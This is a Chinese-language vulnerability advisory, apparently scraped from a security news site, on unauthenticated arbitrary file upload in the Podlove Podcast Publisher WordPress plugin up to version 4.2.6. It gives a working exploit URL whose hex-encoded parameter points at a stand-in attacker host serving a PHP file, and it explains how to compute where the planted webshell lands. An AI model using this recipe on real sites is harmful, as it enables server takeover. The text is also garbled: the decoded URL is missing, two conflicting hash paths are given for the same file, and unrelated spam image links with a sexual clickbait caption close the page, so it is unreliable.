2、影响:
产品或组件及版本:Podlove Podcast Publisher 版本<=4.2.6
3、细节:
该漏洞源于
\podlove-podcasting-plugin-for-wordpress\lib\model\
image.php约463行的move_as_original_file方法中,未对文件后缀进行验证导致,可导致攻击者无需登录在未授权情况下上传任意文件(包括webshelll)到目标服务器,获取服务器权限。
在未登录状态,直接访问链接:
http://domain/
index.php?podlove_image_cache_url=
68747470733a2f2f6576696c2e636f6d2f746573742e706870&podlove_width=500&podlove_height=0&podlove_crop=0&podlove_file_name=1
即可在网站目录/wp-content/目录下生成:
/cache/podlove/e5/280e279c399dd5a480a4cbf5909d1f/
1_original.php
其中
68747470733a2f2f6576696c2e636f6d2f746573742e706870
为hex,转换后为:
而生成的路径:
/e5/375ed26ecd96c193bdb826a52e03fbe7/
1_original.php
/e5/375ed26ecd96c193bdb826a52e03fbe7为
podlove_image_cache_url 和podlove_file_name拼接之后的字符串的MD5值处理后的结果:
1_original.php中的1则为podlove_file_name的值,如果podlove_file_name带点(.)则会被替换为横杆(-);
由此可未授权访问触发SHELL的链接,并推算出shell的地址,进行访问;
![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)
青云网
